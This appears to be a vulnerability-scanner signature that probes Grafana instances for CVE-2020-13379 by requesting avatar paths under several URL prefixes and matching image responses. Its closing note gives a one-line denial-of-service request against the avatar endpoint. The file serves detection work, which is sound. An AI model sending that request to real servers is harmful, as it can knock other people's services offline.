id: CVE-2020-13379 info: name: Grafana DoS Probing risk: High params: - root: '{{.BaseURL}}' variables: - endpoint: | / /grafana/ /debug/grafana/ /-/grafana/ /gitlab/-/grafana/ /-/debug/grafana/ requests: - method: GET redirect: false url: >- {{.root}}{{.endpoint}}avatar/120 headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 detections: - >- StatusCode() == 200 && StringSearch("resHeaders", "Content-Type: image/jpeg") && StringSearch("body", "IEND") && StringSearch("body", "PNG") references: - https://www.cvebase.com/cve/2020/13379 - note: | Patched instance will show 404 code. Real DoS POC is http://target.com/avatar/%25anything